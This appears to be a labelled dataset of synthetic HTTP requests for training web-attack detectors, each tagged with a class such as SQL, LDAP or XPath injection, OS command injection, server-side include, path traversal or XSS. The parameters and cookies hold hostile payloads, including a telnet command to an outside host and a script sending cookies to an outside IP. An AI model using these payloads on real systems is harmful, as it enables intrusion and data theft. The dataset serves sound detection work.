GET /XssAw/cw3g3Rso/pcGlxhWjdbV49Ag.css?srHn4shsn=oa9i%2B&Ln.rnullR=neohe6ldo8hzip&atreNlA=878534&nl=metai&0NLU41K7o=%26%3EOaccess_logesock_streamo%2Frashh+i&vbscript0mqoVM509=2rs3de0ezu&81d1=243267&AiUcm8Ft9input=s7KHPfb HTTP/1.0
Host: 219.240.248.248
Connection: Tkukthne
Accept-Charset: *;q=0.8
Accept-Encoding: *
Client-ip: 100.64.12.55
Cookie: Uioreotge6A=wp-hin;teyn=aesinSnSm;nDAumaintee=67)(&(objectClass=ebbs)(|(sn    =nzln)(cn=eU    J*));Z0S@libQNP=eXXV;5tF-=692673271
Date: Wed, 29 Jun 05 07:28:56 UTC
Expect: iniag
If-Modified-Since: Thu, 16 Sep 04 13:20:08 UTC
If-None-Match: "6EO2ZACIP3mpFXJi"
MIME-Version: 5.4
Pragma: no-cache
Referer: http://www.TmNeat8.de/rIiismP/Yngnza.pdf
User-Agent: Mozilla/5.1 (compatible; qvq5htnth; SunOS sun4u; orer3; beE6teec; 6gr02j)
UA-Disp: 3638,209,8
UA-Pixels: 0618x943
Via: HTTP/6.5 233.91.125.235:05, nme/6.3 www.ssolapo0.js, 5.4 www.iteeee.css
Transfer-Encoding: grnni; anothiN=sCenrEse
Warning: 915 www.ahoeEnX.jpg "ohpodbtpigor" 
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37506
Start - Id: 38563
class: LdapInjection
GET /7h6rs9gu6epb/8LSydVcdVmCsxWpL.pl?Etiiev4aa2Ewehg=%288nsa89a9gv+w&az7jTpESEQcC=r1e&lOe=8027612293&gbekCwgbel0a=times8oshngbe&aphsatlnseeg=w+a3%5D&nhma=5qs-LbE&btn1v=858848&9e56aNiiu8buz=%29++%28++%7C+%28+cn%3D*o+++%27brien*%29%28mail+%3D*o+%27brien*++%29+++&r7access_logGP0-=tui+he&IVnYpasswdhaving73TYQX=eMN HTTP/1.1
Host: www.ain3chhleo.st
Connection: close
Accept: image/*, video/quicktime
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 5I-ndes0wI, hdco-nsNbte
Cache-Control: no-cache
Client-ip: 164.121.66.240
Cookie: md=r0oo;meEI=83070;iacvemaneet9Amc=nmeb9openexecllhug mar
Cookie2: $Version="55"
Date: Mon, 01 Sep 08 23:40:11 GMT
ETag: "yvLqbLU3KSVEEAqM"
Expect: 100-continue
From: Mi7ssg@viIni5i6.de
If-Modified-Since: Sun, 29 Nov 09 20:08:17 GMT
If-Unmodified-Since: Thu, 19 Jun 08 15:18:15 CET
If-Match: *
If-None-Match: "AyjHi7Z-kntrxlEF"
If-Range: "A-jDpJflhN@CSYCe92s"
Max-Forwards: 4
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: ohceo eebrth=greetthm
Authorization: Digest realm
Range: -5
Referer: http://ho1ie.st/92usltts/eE6s.cgi
TE: trailers,chunked
Trailer: Cache-Control
User-Agent: Mozilla/7.3 (Windows; U; Windows NT 0.5; si-aa; rv:9.6.4) Gecko/43373981
UA-CPU: 68000
UA-Disp: 9162,3647,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6483x132
Via: 5.6 34.175.24.184:7813, 9.8 7.150.59.202, HTTP/9.5 63.165.173.220
Transfer-Encoding: identity
Upgrade: noo/0.4
Warning: 605 www.aElte.jpg "smttlahhNbrou8r" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 0288802054604644545
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38563
Start - Id: 35394
class: SqlInjection
GET /Xc/eZO2a2b/EQ/naHov72EKVm5AqY0JHh/ederniMoUr/TDL0/2esleBcAe03/swU/n1bzstiot.tiff?PIiBvrtg4h=ood&dwtlu=e4nc%27%2F**%2FUNION%2F**%2FSELECT%2F**%2FnaDoio%2F**%2FFROM%2F**%2Fdba_users%2F**%2FWHERE%2F**%2FbqSa%2F**%2Flike%2F**%2F%27%2525&cestEtrno=SItisE%25&6aoAxotai0teOy=stwidya&ai=+ftpo&sojtxGmu=91047444&ea5Rteu=iE8ew_0 HTTP/1.1
Host: 131.82.111.85:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, identity;q=0.4
Accept-Language: *
Cache-Control: max-age=9
Client-ip: 42.209.93.236
Cookie: ati5steu=xtermmnir;ploEs=08516422;eo=71
Cookie2: $Version="6"
Date: Tue, 29 May 07 12:25:16 UTC
ETag: W/"1zpGD6YngN8ikJCz7Uio"
Expect: tqnkotl=tntt5;qeotah=wGst
From: 0boosr3e@ftEeuLd2wt.it
If-Modified-Since: Thu, 30 Mar 06 02:30:26 CET
If-Unmodified-Since: Thu, 04 Dec 08 24:23:41 GMT
If-Match: "fRJc2.6RTWccVquj"
If-None-Match: "ohWC_3App6WkEvSDwF"
If-Range: "5LkSCrlPbaT_H-Ke@"
Max-Forwards: 4
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWlEb1RhQXNodXNobmt0cmVlNnMxbnVoc0ljb2xsaWdjZW1z
Authorization: NTLM ZHVhZWkxZUFlTHRsbnBjUmJEdGRkYm5lUnI0bUNseWw4anM=
Range: 24492-281270
Referer: http://www.ys5uopf3.net/azfnhu/cuyhe.shtml
TE: gzip,trailers,gzip;q=0.6
Trailer: Accept-Charset
User-Agent: bsx7MSDyOD http://www.Eyv8.st
UA-CPU: Sparc
UA-Disp: 962,2383,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 177x860
Via: FTP/2.4 88.175.11.153:85, 3.7 84.58.189.38
Transfer-Encoding: identity
Upgrade: nk2i4r/2.9, ipzf/4.9
Warning: 933 134.218.228.163:17 "vrrEhe411r" 
X-Forwarded-For: 31.250.119.48
X-Serial-Number: 840148
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35394
Start - Id: 39056
class: LdapInjection
POST /reoe2Hyub5nkl3hGChU/sbBemR/6brEhGwo/uoodiYxaNt/eRhVMRiEI@zI/g8ir4nsEjt/oZVr0cAf8/tw9FyO/ubh/s1bH/i2M6PoR/hCvjl4ixUT9LnpiD.jsp? HTTP/1.1
Content-Length: 125
Content-Language: l8mM,eqt5,liA3
Content-Encoding: gzip
Content-Location: /o5mUtiur.mspx
Content-MD5: c2hyYzVndDBzaWZtY3JoOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 08 Mar 08 02:09:48 UTC
Last-Modified: Wed, 20 Sep 06 03:24:02 UTC
Host: 41.179.77.240
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: hx-yw
Cache-Control: no-cache
Client-ip: 48.137.231.218
Cookie: 7haes8c=52927196;afli=102)(&(objectClass=mase)(|(sn=   Bma)(cn=lmoa   J*));ihbarthSeo=oiRY83_a1;zhIsvNentvwtb=lznpositiono
Cookie2: $Version="49"
Date: Mon, 12 Sep 05 13:58:53 CET
ETag: W/"_hOflZ-70QRXkuOrXJk."
Expect: ioeEtOf=oeptsgda;akE0hprt
If-Modified-Since: Wed, 03 May 06 13:52:53 GMT
If-Unmodified-Since: Sat, 18 Mar 06 14:55:12 GMT
If-Match: *
If-None-Match: "pHzDYZ4SPjdwvHMI1"
If-Range: *
Max-Forwards: 49
MIME-Version: 8.9
Pragma: no-cache
Authorization: Digest nonce
Range: -610188,-64592
Referer: http://lreaPl.fr/eeead5s/ezddfr/tnsasegn/h7sdo.css
Trailer: Accept-Language
User-Agent: alitoaEhotaO9qod8Fa
UA-OS: Mac OS X
UA-Pixels: 7144x0015
Transfer-Encoding: gzip
Upgrade: gPce2/7.1, oera/8.7, plyti5/7.4, 84fe/7.1
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tmpz2W=Ese9acci313n1omi&mauw=cYfs17tminaai&dsltd4t1k=7381&C9@rOl8Nxml=33444673&nMha2thTe3onAho=[emny&nd0Q=8915&ccd=20791832

End - Id: 39056
Start - Id: 43454
class: OsCommanding
GET /roxmoathwmhsyp.bin?aiHdIe8imeowmeu=246281&ta9Ys_S=1704799&ObXRQ9Ol=i&sOaRyt5d7surco=a0nnnt&nssrieagai=%5C%22+++%5C%3B+++++%5C%2Fusr%5C%2Fbin%5C%2Ftelnet+www.aretst.com+++5941%5C%3B&raafsiotrlsf=Gallj&Efi9iaXa=g2DPv8g9&t00io99rei=echoNt&tAstihteeONl=06&dH=c0o%24nudkmwee9&ntoth7br=eTgd6tnobject%29mno7ca HTTP/1.1
Host: www.hiuyttospt.fr
Connection: seyhi6Z
Accept: */*;q=0.7
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: 3-siotel, gtpna-moqm
Cache-Control: max-age=00
Client-ip: 106.211.70.62
Cookie: rrTearfmeeeo=zs?x;xYOXp=oet&cvard%ctbpel
Cookie2: $Version="5"
Date: Fri, 11 Jun 04 17:04:28 GMT
ETag: W/"KC8c4oPy9Q8-AacFtL"
Expect: 100-continue
From: epsEeMfq@8rnt5E1rt.ch
If-Modified-Since: Mon, 06 Sep 04 12:19:30 GMT
If-Unmodified-Since: Mon, 09 Jul 07 17:35:30 GMT
If-Match: "V7wcSN_i8QuCP19De"
If-None-Match: *
If-Range: Mon, 29 Sep 08 03:12:51 CET
Max-Forwards: 49
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Digest nc=19e24fDE
Authorization: ryOr5p lbIrneba=8rs6eky
Range: -0418,311-
Referer: /efnnnstr/dsli.avi
TE: chunked,deflate;q=0.5,trailers
Trailer: Transfer-Encoding
User-Agent: aweeaiL
UA-CPU: PowerPC
UA-Disp: 2710,0982,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 801x1629
Via: 8.5 67.0.125.165, eeeJ2/6.1 www.En8tecn.css:9653, ismo/9.7 www.EmrsnYf.gif
Transfer-Encoding: gzip
Upgrade: s2or1r/5.6, unus/0.2, iUp/7.1
Warning: 854 www.dmgmntsM.css "es0e0ne4" "Sat, 04 Oct 08 20:47:43 GMT"
X-Forwarded-For: 52.147.136.153
X-Serial-Number: 6389535154069770077
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43454
Start - Id: 40551
class: SSI
GET /t-eFrPzQ4UilLalx_z/r4raaheodeOAsz/hcqs/tlyLxoD59Fg/JN9lLrmIperl6Qh_autoexecP/ZqOobjectLGjstylelRq/openYpII1PBPY/rhahdtbweiccatt/stOaT_MvWkq4WN3Ez/t3j61FidHT5P0ywqpnk/nit1sErdpoaeu.mdb?ahuns=%3C%21--+++++%23include++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+--%3E HTTP/1.1
Host: 23.197.192.141
Connection: a6uCr
Accept: image/*;q=0.3, audio/basic, text/plain;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: nlla-foeernpa;q=0.7
Cache-Control: no-transform
Client-ip: 240.170.17.104
Cookie: bjp=ddssftalt|t'iDi1jt
Cookie2: $Version="45"
Date: Tue, 25 Aug 09 01:37:11 CET
ETag: "shj6cd5gNPyMBr-"
Expect: 100-continue
From: dllx8s1@F9aYw68.biz
If-Modified-Since: Sat, 27 Oct 07 15:55:11 GMT
If-Unmodified-Since: Mon, 26 Feb 07 03:32:59 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 371
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: eyuU tZee=sndi
Authorization: Basic OWJlYWVhOnVpc2Q=
Range: 33-,9-
Referer: http://Dear5.biz/5taurad/anre.asmx
TE: gzip
Trailer: Accept-Charset
User-Agent: Mozilla/4.9 (compatible; Konqueror/7.5; WinNT; 2nkacAa3; sqhU)
UA-CPU: MIPS
UA-Disp: 5247,6150,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 0457x8183
Via: 3.5 www.de66.jpeg
Transfer-Encoding: gzip
Upgrade: enoi6/9.0, nmeG/6.4, qlt/3.9
Warning: 564 www.dt5nmh.gif "yhcyTbTnls0" 
X-Forwarded-For: 172.8.17.63
X-Serial-Number: 851441639
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 40551
Start - Id: 38722
class: LdapInjection
GET /Wx7FiGh0/a-BHPSnE87RSIWO4MPi/hOcKnQi/oCcqEJO2qo-dP5/jipDJQUroWm5PKx3K@8e/rv/dhmrrxn1htne/adminoLLUkjtjEG33x/m0oldc.js?ngaod=cho%29%28%7C%281sd%3D*%29&vi6otlganes=84&mSuAD=e63N+d%29de2ead&eehryAlMMetnehj=Ro-o%3Erjy&Ftmo9eje7t2treh=5611137302&j1mUoocoeeoolat=244&eaamxtnjpsja=96343518&P@Ud=11563 HTTP/1.1
Host: 38.183.188.40
Connection: N61EE
Accept: image/*;q=0.2, video/mpeg, video/mpeg;q=0.1
Accept-Charset: macintosh;q=0.9, iso-2022-jp;q=0.1, x-mac-arabic
Accept-Encoding: *
Accept-Language: t-oeamn;q=0.7
Cache-Control: no-transform
Client-ip: 132.55.39.12
Cookie: vlikeiPu8XJ=7uSjuWd.;pmfOls0LT7=1esJ8w;8nh=q
Cookie2: $Version="8"
Date: Sat, 19 Nov 05 04:06:21 CET
ETag: "A48RBMO2ubP-JQ_buI"
Expect: dv2os
From: ilrb@h5ihiwr.cz
If-Modified-Since: Mon, 29 Nov 04 22:22:39 GMT
If-Unmodified-Since: Tue, 22 Sep 09 17:56:10 GMT
If-Match: "AEFRn_BfxVQKRWtDbZI"
If-None-Match: "QgEgtKeq5TWfv86vD5Lk"
If-Range: *
Max-Forwards: 94
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Digest algorithm=pssp
Authorization: Digest realm
Range: 5873-
Referer: /0rsrrnhy/y3rr1/QotihO/yheDH/5mgcl.dll
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/8.5 (Windows; U; Win 9x 3.5; za-ox; rv:8.2.7) Gecko/08523827
UA-CPU: 68000
UA-Disp: 281,271,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 094x3377
Via: 7.1 www.ytt8r.html
Transfer-Encoding: deflate
Upgrade: ei1/2.0
Warning: 792 57.164.145.223:2 "o6u6iwaenei" "Thu, 08 Oct 09 12:11:05 UTC"
X-Forwarded-For: 18.156.103.46
X-Serial-Number: 89253590
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38722
Start - Id: 39171
class: SSI
POST /et21RGY-e7POYUH6k/ies7rnad6hgronhoe/jNoW/finc8/rjm4E3x9.oY@uEk8Nk_/yRZa2FyJqX_T.html? HTTP/1.0
Content-Length: 112
Content-Language: siW2bee
Content-Encoding: compress
Content-Location: /ctnhEd2t/urtd9ot/pkgoblt/lhTu/iralr.bin
Content-MD5: M2VJYTlzNXRvdWU2aWRzYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 22 Jan 04 23:44:08 CET
Last-Modified: Thu, 20 May 04 23:21:11 UTC
Host: www.saRyxs.cz:654
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1255;q=0.2, x-mac-arabic, iso-2022-jp
Accept-Encoding: 
Accept-Language: ngvfsojh-r5sss;q=0.7, iab0ohda-ld7nnaUe;q=0.2, wtG1Icf-9hscdn
Cache-Control: o1onee='hle'
Client-ip: 188.217.176.142
Cookie: EemIctl5Ipzynm=ntifsock_streamexecoyrTnwhereAe;ens=8715202;ssEsceaif=z4hwmet
Date: Sun, 13 Feb 05 09:01:19 GMT
If-Modified-Since: Tue, 19 Feb 08 07:52:08 UTC
If-Unmodified-Since: Mon, 19 Dec 05 10:37:22 CET
If-None-Match: *
Max-Forwards: 779
Pragma: Orai='diiu2mDt'
Referer: http://www.nowtn5.com/0sth/iaehB/4noyyao/2errae91.gz
Trailer: Trailer
User-Agent: Mozilla/7.6 (X11; U; Open BSD i386 8.4; 8n-ds; rv:9.7.4) Gecko/72985667
Via: 1.7 237.184.121.134, FTP/2.0 www.tawafutw.jpg
~~~~~: ~~~~~~~~~~

Ne1WrjJDbw=37643257&tsifleee8=<!--#echo var="date_gmt"-->&di=1home8r8bugmso&InetcatbyRL-SFm=tfuo1e

End - Id: 39171
Start - Id: 36891
class: LdapInjection
GET /s4VLYEKkm/iTe4ZVmetaAQ/rjOGW/.-/sbUc/tjpo3IzHtoxm-_DxGcW/6epb6muPEOFZZ/p2dstzunTueY/nta1oedfgrehe2xfb.jpg?soOcnote1=rcpwE+&00iscl=Hird&Qo8p@vT6=tRgij1A-4Tx%40&yhsnd=yrpea&oo5Getirsn2=56&tr=7780&teg=gdw HTTP/1.0
Host: www.erstac5.it
Connection: ernd
Accept: audio/*;q=0.2, application/rtf;q=0.6, audio/*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Cookie: St=89;Nei4dltitimlsI=)    (   | (displayName=had*)(name  =   had*   )(    mail=had* );jlpakreii=ee 
Date: Wed, 02 Nov 05 10:09:08 CET
ETag: W/"95TxP@Lz1MINT2S4q4D"
Expect: hda4oss=sytee
If-Modified-Since: Wed, 10 Mar 04 20:34:18 GMT
If-Unmodified-Since: Tue, 03 Feb 09 20:56:17 UTC
If-Match: "Ofd6UR1IJt@@VOC"
If-None-Match: "wueN4JA3T4GYj2N178"
If-Range: Wed, 09 Dec 09 19:28:58 GMT
Max-Forwards: 100
MIME-Version: 6.7
Pragma: ons8oBh='u'
Authorization: NTLM eW5lbm5VM215cmhobWVkbmV0bzBpYWVlaGZpeWNuaWg5dXV0b1RlM005aXM=
Range: 158-39,21618-
Referer: /lewisr3/bi8r/itle/7T4p/ebnuws8.swf
TE: gzip;q=0.5,gzip,chunked
User-Agent: 2antw (7T.5i_UuDa; y-vU3bQUY)
UA-CPU: Sparc
UA-Color: color8
Via: FTP/9.8 58.236.130.117, 0.3 www.07eb.jpg
Transfer-Encoding: deflate
----: -------------------

null

End - Id: 36891
Start - Id: 38270
class: LdapInjection
GET /sli3aacU.asmx?aBeo=eel%3Fa&lns9tytMoi=%3E%2B&cc=het&vsteo=iFdY&AXUncJeL=iUC&0ZeBZo=42&mheedNl1jdat=stSfO1y&nu1ftotniVi=e+ouwv5hZ&cxco=ye+swa1aay&i4KaEm=ec-du&T5RT=0529787&Mbs=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&ueeaejhdh=-servicest HTTP/1.0
Host: www.aeuasttl.be
Connection: close
Accept: */*
Accept-Charset: iso-10646-ucs-2;q=0.5, iso-8859-15, cp-936, isiri-3342;q=0.2, iso-8859-5;q=0.1
Accept-Encoding: identity;q=0.8, identity;q=0.2
Accept-Language: *
Cache-Control: max-age=03
Client-ip: 227.248.33.223
Cookie: 5nlqliaszuft=0;caiicdpectp4hlN=tw)t;te=56854624;mena=cLJefOT;aaCeqmwcb=99173772
Cookie2: $Version="50"
Date: Fri, 18 Jan 08 20:49:01 GMT
ETag: "xaVLYvomP3MKC3Xw"
Expect: 100-continue
From: iaon@um9ltetugp.biz
If-Modified-Since: Tue, 21 Mar 06 09:28:53 GMT
If-Unmodified-Since: Thu, 31 Aug 06 08:57:45 GMT
If-Match: ".Ihim2K9CjyoZvLuNKrf"
If-None-Match: "@wfsLg-jP-e4XxEwK"
If-Range: "r.Xt_DnneVqfbeawUjQ"
Max-Forwards: 106
MIME-Version: 6.5
Pragma: ahcgitt='9alT70Lm'
Proxy-Authorization: NTLM ZXJydTFhY2xuaHV5YTBsYWFlZHVlbmF3aXJkbnV0aW10YQ==
Authorization: Basic RG90bWQ6OWVhZXRzaA==
Range: 61-,82592-5
Referer: http://www.wXhhead.st/ThfovB/lsonf.htm
TE: deflate,chunked;q=0.7,deflate
Trailer: Proxy-Authorization
User-Agent: tRJOkBw http://www.natn.fr
UA-CPU: PowerPC
UA-Disp: 284,6564,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 4041x0261
Via: HTTP/2.2 www.ue71f30o.css
Transfer-Encoding: gzip
Upgrade: o4f/8.5, ihuE/9.9
Warning: 420 www.hNfxAea.shtml "ha5earnepwc" "Thu, 20 Jan 05 10:55:49 UTC"
X-Forwarded-For: 165.116.155.114
X-Serial-Number: 5189731
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38270
Start - Id: 40567
class: SSI
GET /6pIdiloaPyrT2tse/t8hyZIenkhhs/sgNZbAqQeATZdlB-_6.cfm?seF=%3C%21--++%23include+virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++++--%3E&tXipshzr=mplibaa&licli=22354&yOeayehHfetysfa=tLJ&LcTEpheoga=trOpceRep&rndS0bil1ewrk=6015933373&ncuse=dDlc5di2y9&nnaae=%26hWinsertr&cuautoexecncaE6S85.n=fstNi4uoeme&hlhee=6211966179&r8t0If=0tscript&tbea=6 HTTP/1.1
Host: 171.148.0.241
Connection: close
Accept: image/jpeg, audio/x-wav;q=0.8, audio/x-wav
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 65.35.166.11
Cookie: 6nmhoa2nk=329
Cookie2: $Version="84"
Date: Tue, 10 Jan 06 08:34:20 UTC
ETag: "oUtUHSbKf0E9Y3DTy3L"
Expect: 100-continue
From: ciHn@mdreeh.gov
If-Modified-Since: Sun, 10 Dec 06 17:24:05 UTC
If-Unmodified-Since: Wed, 14 Jan 04 02:35:13 GMT
If-Match: "dEMvzW.D2QQLuE3ly"
If-None-Match: *
If-Range: Mon, 09 Jun 08 20:50:18 UTC
Max-Forwards: 082
Pragma: no-cache
Proxy-Authorization: esno rs47tyd=n7dsbg
Authorization: Digest algorithm=MD5-sess
Range: 488078-9765
Referer: http://toaltba.be/srnpnIri/oaOtonp/as4o/t9nok.wmn
TE: gzip;q=0.1
Trailer: Host
User-Agent: Mozilla/7.3 (Windows; U; Windows NT 1.5; es-47; rv:7.7.1) Gecko/32195457
UA-CPU: PowerPC
UA-Disp: 5809,4725,8
UA-OS: Windows 98
UA-Pixels: 0455x286
Via: 6.7 186.126.110.155, 3.0 204.172.153.35
Transfer-Encoding: compress
Upgrade: nmoNa/7.1, shl/2.8, suah/2.9, drnip/9.7, aunle/8.8
Warning: 519 www.eejaeye.png "rslbjmqpxcnge" 
X-Forwarded-For: 93.136.204.39
X-Serial-Number: 56779
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40567
Start - Id: 38668
class: LdapInjection
GET /cwaxeseu9c/IcekW/boU88YnKblg.mdb?si5=46314947&anus0pmdrrsh67=rnv+duns0ghnm&iOy=%29++++%28%7C+++%28++++cn%3D*o+%27brien*+++%29%28mail%3D*o+++%27brien*++++%29+&G7nODR=17830&REHl5eJs=65 HTTP/1.0
Host: www.oElccavmr.ch
Connection: 6tooaNi
Accept: image/png;q=0.8
Accept-Charset: x-mac-korean;q=0.7
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: min-fresh=8346
Client-ip: 202.109.50.24
Cookie: jstnlrs7hrdl=Ilza ed p9Seta;umhaa2= o@c]ett;ARral=6;rsshirnNthk2en=ehecz8g%+;phesWiedveamB=12720541;uAyteo=748
Cookie2: $Version="3"
Date: Fri, 23 Apr 10 20:14:56 GMT
ETag: W/"O9@O-jxY9.LjYLQO"
Expect: 100-continue
From: 0dbnE@pDEweao.biz
If-Modified-Since: Sun, 13 Nov 05 18:25:02 UTC
If-Unmodified-Since: Tue, 20 May 08 21:33:10 GMT
If-Match: "rkeIlLUNvrgOuws"
If-None-Match: "NeoD1gfKW@JvORts_pF"
If-Range: Wed, 02 Sep 09 01:28:03 CET
Max-Forwards: 3443
MIME-Version: 9.7
Pragma: ag=tpgaph
Proxy-Authorization: Basic ZTNpZGlzYzp0czFtb2VmYw==
Authorization: ar0yxt ehNhei=mtatep
Range: -3789,-5,300-00360
Referer: /ttYwidO7/stgN/sdus7Ekl.html
TE: gzip;q=0.7,trailers
Trailer: Accept
User-Agent: Mozilla/0.4 (Windows; U; Windows NT 7.5; ex-ro; rv:7.2.8) Gecko/14708384
UA-Disp: 0550,3953,16
UA-OS: Solaris
UA-Pixels: 7709x7356
Via: o1r/1.1 www.nhorlir.htm, FTP/1.2 85.224.226.63
Transfer-Encoding: gzip
Upgrade: anRsj/9.4, 58agtG/6.3
Warning: 198 210.170.229.105 "HreisPeNtrsDzoqe7" "Mon, 01 Jun 09 16:10:48 CET"
----: -------------------

null

End - Id: 38668
Start - Id: 45154
class: PathTransversal
GET ////? HTTP/1.1
Host: 45.128.245.70
Connection: keep-alive
Accept: audio/*;q=0.7
Accept-Charset: *;q=0.6
Accept-Encoding: gzip, compress;q=0.0, compress;q=0.1, identity
Accept-Language: bn-Sw;q=0.1
Cache-Control: max-stale
Client-ip: 240.134.41.171
Cookie: xetinceeiae=43;owrrttiit6rrOes=9;eskjTy=7rrajyehe
Cookie2: $Version="70"
Date: Thu, 22 Oct 09 23:03:20 UTC
ETag: W/"LCB0SP_0Xh570I545i"
Expect: sIseObpe
From: hdOf9re@eutwEh.uk
If-Modified-Since: Mon, 01 Nov 04 12:21:46 GMT
If-Unmodified-Since: Fri, 18 Feb 05 14:07:59 UTC
If-Match: *
If-None-Match: *
If-Range: "Gk1EwjAU6kbESfcGdK"
Max-Forwards: 9680
Pragma: no-cache
Proxy-Authorization: Digest uri=/e1iBf/tmad/iteoqSih/EPRw/eq6pop.gif
Authorization: NTLM Nm9uZ3pybHUyYWZwOXJvQWtPaTdrcmdzb2ZlYTJ1ZDdENEN0ag==
Referer: http://ieiA.de/dbante/Ofald9rr/iglhBe/jeuldehe/ttwi3.bin
TE: chunked;q=0.7,deflate;q=0.6
Trailer: Accept-Language
User-Agent: 1noa (eIdcyEh-Y; os.9NB; aO1qPrRV2)
UA-Disp: 991,007,8
UA-Pixels: 1177x8327
Via: 5.2 232.112.33.240, FTP/8.1 161.107.224.185
Transfer-Encoding: z5me
Upgrade: 7aW/4.1, nTewc/8.8, eenf/6.5, bhs/8.1
Warning: 845 www.yohtvu.htm:3657 "hi7s4a" 
X-Forwarded-For: 249.70.128.210
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45154
Start - Id: 47981
class: XSS
GET /3ttro6eapiu75fcme/aHjO.Yy9YkZRq/bO6ScdwuUtlAGEF3kyB/rXt6/lnlTcdhrajiyr2nBje96/t7ludmochezlltmd3l/tendiGnoasdRl7doEe.htm?ree6v8027s=oyhdU&cCHg=%3Cstyle++type++++%3D++%22text%2Fjavascript++++%22++++%3E%5Bwindow.open%28%27http%3A%2F%2F10.206.96.47%2Fngen.php3%27%2Bdocument.cookie%29%3B%5D%3C%2Fstyle+++%3E&nm=0sr%3F HTTP/1.1
Host: 170.240.231.146
Connection: keep-alive
Accept: image/*, image/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: rrajHoEs-simterem, ieeC-meecehr;q=0.2, pan4fhw-bie9r
Cache-Control: no-cache
Client-ip: 200.176.81.45
Cookie: B40Un3FH3=3Nnli;qlnn=eneo
Cookie2: $Version="140"
Date: Sat, 20 May 06 21:00:24 UTC
ETag: W/".PIa5x900H8gqvCc"
Expect: 100-continue
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Fri, 14 May 04 10:06:30 UTC
If-Unmodified-Since: Thu, 22 Jun 06 21:32:45 GMT
If-Match: "UVcQk6hSwhr5-qEv"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 8.2
Pragma: 3EtsTeto=nediHeN3
Proxy-Authorization: Digest nc=b2c271ed
Authorization: Basic RGRldWVhOmRzek45
Range: -4,8-
Referer: /sY43/yiriwme/zayarmdh/ineo.htm
TE: chunked;q=0.8,deflate;q=0.2
Trailer: User-Agent
User-Agent: Mozilla/5.3 (Machintosh; U; Mac OS X 6.0; cT-ol; rv:9.9.6) Gecko/08989879
UA-CPU: MIPS
UA-Disp: 719,994,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 480x167
Via: 2.0 96.103.10.196, HTTP/7.7 194.94.15.215, FTP/9.1 31.201.81.96
Transfer-Encoding: gzip
Upgrade: j4z/6.4, aetn/7.6, nyot4w/7.3
Warning: 549 www.7tn2ri.jpg "cr4ayetrlreo6ceei3r" 
X-Forwarded-For: 23.144.158.109
X-Serial-Number: 41529
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47981
Start - Id: 49760
class: XPathInjection
GET /stdineAN/trOJKa/uunT/9bkiavYlSIndh_Mi/pixeelu4y/ogei8eAs.pl?an=35&nh5hntve=0099401&merChri=36987458&T6eeTpttufrni=Nroru&eeAnre1eonlraq=tf3ywknr%27++++or++++N8%2Fatwl%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D1%5D++or+++++%27egnh9%27+++%3D+%27&ll=m1shi HTTP/1.0
Host: 228.125.194.58
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: gndnehr-l;q=0.4, r-am;q=0.3
Cache-Control: max-age=41075
Client-ip: 149.198.73.153
Cookie: sCEeeidton= replaceedabtwgd=ae7ritf;g6u=974874
Cookie2: $Version="367"
Date: Thu, 07 Jan 10 05:36:06 GMT
ETag: W/"gejDXjnrS6tpYzTu_6xQ"
Expect: 6itn=bdoaua
From: 1ni9pe@Genwbli.net
If-Modified-Since: Thu, 27 Aug 09 04:40:27 CET
